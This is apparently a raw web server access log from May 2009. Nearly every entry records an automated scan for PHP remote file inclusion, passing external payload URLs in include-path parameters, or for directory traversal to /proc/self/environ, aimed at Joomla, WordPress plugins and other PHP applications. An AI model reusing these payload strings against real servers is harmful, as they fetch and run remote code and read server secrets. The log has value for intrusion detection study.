91.184.52.10 - - [20/May/2009:00:20:54 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.184.52.10 - - [20/May/2009:00:20:57 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.221.130.12 - - [20/May/2009:00:21:04 -0400] "GET /logs/error_log.Q109042900/dministrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
209.200.8.89 - - [20/May/2009:00:21:07 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:21:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.234.200.152 - - [20/May/2009:00:21:18 -0400] "GET /logs/error_log.Q109042900/dministrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
209.200.8.89 - - [20/May/2009:00:21:19 -0400] "GET /logs/access_log.Q108101000///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:00:21:24 -0400] "GET /logs/access_log.Q109022600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.250.85.200 - - [20/May/2009:00:22:23 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:18 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:18 -0400] "GET /logs/access_log.Q108111700/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:19 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:23 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:23 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:23 -0400] "GET /logs/access_log.Q108111700%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:23:24 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:23:39 -0400] "GET /logs/access_log.Q108101000///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:23:44 -0400] "GET /logs/access_log.Q109020600/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:00:24:25 -0400] "GET /images/ordering_icons_off.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
69.248.128.84 - - [20/May/2009:00:25:07 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.241.40.51 - - [20/May/2009:00:25:11 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:25:17 -0400] "GET //?path%5Bdocroot%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
209.200.8.89 - - [20/May/2009:00:25:17 -0400] "GET /logs/access_log.Q108090900///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.248.128.84 - - [20/May/2009:00:25:18 -0400] "GET /logs//?path%5Bdocroot%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 2093 "-" "libwww-perl/5.79"
163.24.136.10 - - [20/May/2009:00:25:23 -0400] "GET /logs/access_log.Q108090400%20%20//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:25:25 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:25:25 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:25:25 -0400] "GET /logs/access_log.Q109022600/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
171.64.75.45 - - [20/May/2009:00:25:31 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:25:32 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:25:33 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:25:33 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.241.40.51 - - [20/May/2009:00:25:36 -0400] "GET /logs/access_log.Q109030500/errors.php?error=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
171.64.75.45 - - [20/May/2009:00:25:38 -0400] "GET /logs/access_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:39 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:39 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:39 -0400] "GET /logs/access_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
208.97.171.11 - - [20/May/2009:00:25:39 -0400] "GET /logs/access_log.Q109050900/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
171.64.75.45 - - [20/May/2009:00:25:39 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:40 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:55 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:55 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:56 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:56 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:56 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:25:56 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
121.165.73.157 - - [20/May/2009:00:25:59 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:00:25:59 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:00:25:59 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:00:26:04 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:00:26:04 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:00:26:05 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:26:11 -0400] "GET /logs/access_log.Q108090900///vwar/backup/errors.php?error=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:26:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
171.64.75.45 - - [20/May/2009:00:26:34 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:26:34 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:26:34 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:26:34 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
171.64.75.45 - - [20/May/2009:00:26:34 -0400] "GET /logs/access_log.Q108120400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:26:38 -0400] "GET /logs/access_log.Q108120400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.122.26.5 - - [20/May/2009:00:26:53 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:00:26:59 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.154.225 - - [20/May/2009:00:26:59 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.154.225 - - [20/May/2009:00:26:59 -0400] "GET /logs/access_log.Q108091400/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
65.23.154.225 - - [20/May/2009:00:26:59 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
65.23.154.225 - - [20/May/2009:00:27:00 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:27:00 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:27:00 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:27:00 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
221.139.104.104 - - [20/May/2009:00:27:01 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
218.185.20.88 - - [20/May/2009:00:27:04 -0400] "GET //redaxo/login.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.185.20.88 - - [20/May/2009:00:27:04 -0400] "GET /logs//redaxo/login.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.185.20.88 - - [20/May/2009:00:27:04 -0400] "GET /logs/access_log.Q109042500//redaxo/login.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:00:27:14 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:00:27:16 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.154.225 - - [20/May/2009:00:27:16 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
65.23.154.225 - - [20/May/2009:00:27:16 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:27:16 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
208.97.171.11 - - [20/May/2009:00:27:20 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:27:20 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.97.171.11 - - [20/May/2009:00:27:20 -0400] "GET /logs/access_log.Q109050900/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.175.180.194 - - [20/May/2009:00:27:44 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/ask_password.php?dir=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.137.192.223 - - [20/May/2009:00:28:12 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:28:17 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:28:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
171.64.75.45 - - [20/May/2009:00:28:25 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:28:25 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.122.26.5 - - [20/May/2009:00:28:37 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:00:29:07 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
171.64.75.45 - - [20/May/2009:00:29:33 -0400] "GET /logs/access_log.Q108091400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:29:35 -0400] "GET /logs/access_log.Q108091400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:02 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:02 -0400] "GET /phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:02 -0400] "GET /logs/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:03 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
121.165.73.157 - - [20/May/2009:00:30:07 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:00:30:11 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:11 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:13 -0400] "GET /logs/access_log.Q108052400/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:13 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:14 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:30:14 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:30:14 -0400] "GET /logs/access_log.Q108052400/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:30:14 -0400] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:30:18 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:18 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.1.64.133 - - [20/May/2009:00:30:19 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:30:19 -0400] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
200.32.100.130 - - [20/May/2009:00:30:19 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:19 -0400] "GET /logs/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:19 -0400] "GET /phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:30:20 -0400] "GET /logs/access_log.Q108110700/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.50.189.241 - - [20/May/2009:00:31:09 -0400] "GET /logs/error_log.Q109011400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
209.59.12.99 - - [20/May/2009:00:31:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.154.225 - - [20/May/2009:00:31:41 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
65.23.154.225 - - [20/May/2009:00:31:41 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.154.225 - - [20/May/2009:00:31:42 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
